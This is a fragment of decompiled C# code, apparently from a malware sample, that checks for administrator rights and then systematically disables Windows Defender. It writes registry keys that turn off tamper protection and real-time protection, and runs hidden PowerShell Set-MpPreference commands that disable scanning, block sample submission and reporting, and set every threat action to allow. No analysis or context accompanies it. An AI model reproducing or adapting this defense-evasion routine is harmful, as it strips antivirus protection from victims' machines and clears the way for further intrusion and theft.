// Token: 0x0600003A RID: 58 public static void SetRegistryKey() { if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) { ModifRegitry.PushRegistryKey("SOFTWARE\\Microsoft\\Windows Defender\\Features", "TamperProtection", "0"); ModifRegitry.PushRegistryKey("SOFTWARE\\Policies\\Microsoft\\Windows Defender", "DisableAntiSpyware", "1"); ModifRegitry.PushRegistryKey("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableBehaviorMonitoring", "1"); ModifRegitry.PushRegistryKey("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableOnAccessProtection", "1"); ModifRegitry.PushRegistryKey("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableScanOnRealtimeEnable", "1"); ModifRegitry.GetMSEPrefUser(); } }
// Token: 0x0600003C RID: 60 private static void GetMSEPrefUser() { Process process = new Process { StartInfo = new ProcessStartInfo { FileName = "powershell", Arguments = "Get-MpPreference -verbose", UseShellExecute = false, RedirectStandardOutput = true, WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true } }; process.Start(); while (!process.StandardOutput.EndOfStream) { string text = process.StandardOutput.ReadLine(); if (text.StartsWith("DisableRealtimeMonitoring") && text.EndsWith("False")) { ModifRegitry.Loadpowershell("Set-MpPreference -DisableRealtimeMonitoring $true"); } else if (text.StartsWith("DisableBehaviorMonitoring") && text.EndsWith("False")) { ModifRegitry.Loadpowershell("Set-MpPreference -DisableBehaviorMonitoring $true"); } else if (text.StartsWith("DisableBlockAtFirstSeen") && text.EndsWith("False")) { ModifRegitry.Loadpowershell("Set-MpPreference -DisableBlockAtFirstSeen $true"); } else if (text.StartsWith("DisableIOAVProtection") && text.EndsWith("False")) { ModifRegitry.Loadpowershell("Set-MpPreference -DisableIOAVProtection $true"); } else if (text.StartsWith("DisablePrivacyMode") && text.EndsWith("False")) { ModifRegitry.Loadpowershell("Set-MpPreference -DisablePrivacyMode $true"); } else if (text.StartsWith("SignatureDisableUpdateOnStartupWithoutEngine") && text.EndsWith("False")) { ModifRegitry.Loadpowershell("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"); } else if (text.StartsWith("DisableArchiveScanning") && text.EndsWith("False")) { ModifRegitry.Loadpowershell("Set-MpPreference -DisableArchiveScanning $true"); } else if (text.StartsWith("DisableIntrusionPreventionSystem") && text.EndsWith("False")) { ModifRegitry.Loadpowershell("Set-MpPreference -DisableIntrusionPreventionSystem $true"); } else if (text.StartsWith("DisableScriptScanning") && text.EndsWith("False")) { ModifRegitry.Loadpowershell("Set-MpPreference -DisableScriptScanning $true"); } else if (text.StartsWith("SubmitSamplesConsent") && !text.EndsWith("2")) { ModifRegitry.Loadpowershell("Set-MpPreference -SubmitSamplesConsent 2"); } else if (text.StartsWith("MAPSReporting") && !text.EndsWith("0")) { ModifRegitry.Loadpowershell("Set-MpPreference -MAPSReporting 0"); } else if (text.StartsWith("HighThreatDefaultAction") && !text.EndsWith("6")) { ModifRegitry.Loadpowershell("Set-MpPreference -HighThreatDefaultAction 6 -Force"); } else if (text.StartsWith("ModerateThreatDefaultAction") && !text.EndsWith("6")) { ModifRegitry.Loadpowershell("Set-MpPreference -ModerateThreatDefaultAction 6"); } else if (text.StartsWith("LowThreatDefaultAction") && !text.EndsWith("6")) { ModifRegitry.Loadpowershell("Set-MpPreference -LowThreatDefaultAction 6"); } else if (text.StartsWith("SevereThreatDefaultAction") && !text.EndsWith("6")) { ModifRegitry.Loadpowershell("Set-MpPreference -SevereThreatDefaultAction 6"); } } }